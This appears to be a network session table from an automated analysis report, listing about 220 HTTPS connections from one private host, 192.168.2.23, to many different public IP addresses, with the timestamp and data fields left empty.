                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24570192.168.2.2352296199.235.177.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24571192.168.2.235693068.142.153.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24572192.168.2.2340148101.20.221.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24573192.168.2.2337246104.100.1.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24574192.168.2.2340954216.132.228.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24575192.168.2.2346378159.76.142.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24576192.168.2.233469099.191.40.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24577192.168.2.2356492196.95.108.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24578192.168.2.233795066.239.179.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24579192.168.2.234041668.234.243.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24580192.168.2.234553285.179.162.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24581192.168.2.2349878184.94.200.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24582192.168.2.235891259.119.54.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24583192.168.2.2358720141.174.52.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24584192.168.2.2346718197.87.111.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24585192.168.2.2350486218.199.249.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24586192.168.2.2335656158.91.67.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24587192.168.2.2346096131.87.28.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24588192.168.2.2344512194.144.57.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24589192.168.2.2341352210.226.152.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24590192.168.2.2342090106.18.113.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24591192.168.2.234256447.246.123.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24592192.168.2.234463246.233.43.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24593192.168.2.2350874165.220.111.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24594192.168.2.2354578104.90.172.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24595192.168.2.233552845.93.85.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24596192.168.2.2356724124.182.67.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24597192.168.2.233975412.247.147.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24598192.168.2.2343702146.66.65.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24599192.168.2.235547867.8.124.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24600192.168.2.2353432137.89.96.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24601192.168.2.2335888204.228.201.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24602192.168.2.2353454222.246.4.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24603192.168.2.2340678182.43.253.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24604192.168.2.23542909.163.4.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24605192.168.2.233522854.1.163.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24606192.168.2.2336258217.126.121.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24607192.168.2.2333540141.55.166.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24608192.168.2.2337368191.124.80.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24609192.168.2.234204880.237.204.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24610192.168.2.2340352199.241.64.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24611192.168.2.235040069.166.229.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24612192.168.2.235133449.100.27.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24613192.168.2.2338386154.192.46.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24614192.168.2.2360398206.156.57.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24615192.168.2.234267059.180.197.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24616192.168.2.2344746143.183.98.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24617192.168.2.2332896137.227.98.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24618192.168.2.2347072148.115.202.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24619192.168.2.235933082.233.169.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24620192.168.2.235127882.6.56.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24621192.168.2.235641070.66.161.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24622192.168.2.2341352103.95.252.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24623192.168.2.2354158155.198.21.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24624192.168.2.234533278.209.155.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24625192.168.2.234335845.208.1.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24626192.168.2.234174064.32.198.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24627192.168.2.233920654.178.222.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24628192.168.2.2349714182.16.64.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24629192.168.2.2354248146.174.253.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24630192.168.2.234322617.231.17.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24631192.168.2.2355812160.29.93.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24632192.168.2.2334330151.22.40.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24633192.168.2.233577823.100.1.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24634192.168.2.2357032176.158.61.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24635192.168.2.2337218139.189.201.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24636192.168.2.235310667.102.57.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24637192.168.2.2340162213.27.60.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24638192.168.2.2339084128.234.10.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24639192.168.2.2341026216.230.190.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24640192.168.2.233645470.209.187.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24641192.168.2.235871286.76.44.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24642192.168.2.234272050.230.136.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24643192.168.2.235149689.73.175.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24644192.168.2.234379445.240.193.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24645192.168.2.2335444186.219.12.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24646192.168.2.2355742195.217.14.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24647192.168.2.234366898.22.78.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24648192.168.2.2353024101.170.23.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24649192.168.2.2346566113.137.228.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24650192.168.2.2350740105.218.156.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24651192.168.2.2344504182.40.83.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24652192.168.2.2352478207.134.101.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24653192.168.2.2358460189.250.246.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24654192.168.2.2342492140.246.155.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24655192.168.2.2343108118.101.58.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24656192.168.2.2341400104.248.94.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24657192.168.2.233983236.167.244.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24658192.168.2.2340206145.212.199.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24659192.168.2.2334582169.68.118.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24660192.168.2.2357432123.200.22.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24661192.168.2.235076645.86.132.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24662192.168.2.2348362139.148.50.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24663192.168.2.2344222101.36.110.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24664192.168.2.2350258141.218.183.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24665192.168.2.2349650165.178.251.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24666192.168.2.2349068210.244.135.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24667192.168.2.233965887.109.11.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24668192.168.2.235056292.49.202.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24669192.168.2.2334434179.202.171.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24670192.168.2.235937860.253.168.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24671192.168.2.2354356141.19.231.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24672192.168.2.2348648200.216.23.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24673192.168.2.23345549.64.23.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24674192.168.2.235492659.205.182.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24675192.168.2.235803262.183.38.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24676192.168.2.2335650117.233.234.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24677192.168.2.233650844.49.214.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24678192.168.2.2349934185.244.166.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24679192.168.2.235823646.99.219.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24680192.168.2.2347572140.228.183.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24681192.168.2.233285047.112.128.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24682192.168.2.2347062178.221.59.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24683192.168.2.2337574107.18.57.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24684192.168.2.2344310196.229.108.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24685192.168.2.2352768185.251.23.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24686192.168.2.2332966125.250.191.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24687192.168.2.2347752141.122.150.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24688192.168.2.2355188190.168.232.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24689192.168.2.2356464110.0.134.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24690192.168.2.234777239.166.241.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24691192.168.2.235454282.127.30.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24692192.168.2.235196270.236.30.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24693192.168.2.2351070186.182.64.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24694192.168.2.234225261.128.121.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24695192.168.2.235877470.45.32.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24696192.168.2.2360918175.212.129.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24697192.168.2.23572024.7.64.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24698192.168.2.2347086205.108.249.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24699192.168.2.2350456164.243.84.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24700192.168.2.2339560163.243.129.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24701192.168.2.234413237.164.230.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24702192.168.2.2360708124.19.99.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24703192.168.2.2356284151.215.182.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24704192.168.2.2356834133.11.38.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24705192.168.2.235809617.97.38.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24706192.168.2.235592458.201.59.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24707192.168.2.236000049.140.39.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24708192.168.2.235803099.206.76.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24709192.168.2.2339566212.39.236.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24710192.168.2.2350176173.158.114.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24711192.168.2.2352880165.109.117.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24712192.168.2.2348180152.83.120.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24713192.168.2.235118817.188.251.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24714192.168.2.235861050.240.172.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24715192.168.2.235587457.68.122.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24716192.168.2.235806496.155.232.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24717192.168.2.233859690.41.204.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24718192.168.2.235574459.101.241.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24719192.168.2.2350576121.146.80.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24720192.168.2.235156290.46.0.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24721192.168.2.234111692.218.13.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24722192.168.2.2335194187.201.241.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24723192.168.2.233840859.48.178.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24724192.168.2.2341378140.43.253.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24725192.168.2.236022257.14.162.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24726192.168.2.2342874198.39.98.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24727192.168.2.2359744204.215.22.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24728192.168.2.233876039.202.167.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24729192.168.2.2343800201.158.132.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24730192.168.2.2352990119.251.96.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24731192.168.2.2349652189.204.177.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24732192.168.2.233771045.95.241.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24733192.168.2.2334280105.16.94.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24734192.168.2.23357809.236.57.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24735192.168.2.2343194182.74.152.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24736192.168.2.2350264129.215.209.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24737192.168.2.2345690178.93.27.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24738192.168.2.2340804218.141.101.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24739192.168.2.2333798165.144.179.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24740192.168.2.234195482.254.174.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24741192.168.2.235582659.207.26.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24742192.168.2.2334328118.25.122.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24743192.168.2.2359384102.47.160.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24744192.168.2.235391817.224.182.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24745192.168.2.23426861.234.44.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24746192.168.2.2333908169.245.81.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24747192.168.2.234217281.235.22.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24748192.168.2.2351120132.115.77.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24749192.168.2.233785458.227.115.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24750192.168.2.2352560193.240.118.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24751192.168.2.2353124125.95.174.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24752192.168.2.2339016193.179.247.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24753192.168.2.235288814.239.202.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24754192.168.2.234563065.4.67.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24755192.168.2.234869819.206.126.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24756192.168.2.2358634106.217.203.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24757192.168.2.2334914152.191.83.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24758192.168.2.2334138194.83.27.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24759192.168.2.2355962126.48.83.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24760192.168.2.235961661.11.74.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24761192.168.2.23476804.246.30.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24762192.168.2.2342686207.91.183.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24763192.168.2.2356890148.156.4.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24764192.168.2.2335210205.89.242.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24765192.168.2.2358612149.131.103.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24766192.168.2.2355956166.38.220.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24767192.168.2.2354692161.35.10.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24768192.168.2.2358894135.21.186.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24769192.168.2.23454028.252.194.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24770192.168.2.2333360109.146.225.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24771192.168.2.2349320138.230.64.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24772192.168.2.2350794198.28.25.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24773192.168.2.2355768133.80.92.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24774192.168.2.234802027.7.239.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24775192.168.2.2359504139.234.100.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24776192.168.2.235255059.140.152.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24777192.168.2.235605671.15.129.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24778192.168.2.2360202188.59.83.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24779192.168.2.2333388159.47.195.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24780192.168.2.2349198165.84.84.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24781192.168.2.234379075.111.75.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24782192.168.2.2348722156.75.11.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24783192.168.2.2357960152.199.43.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24784192.168.2.2358276218.57.6.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24785192.168.2.2354870150.121.173.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24786192.168.2.236030282.207.151.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24787192.168.2.2332932163.160.142.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24788192.168.2.234533689.214.10.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24789192.168.2.2353642193.147.246.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24790192.168.2.233938657.203.32.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24791192.168.2.2348058126.6.8.50443
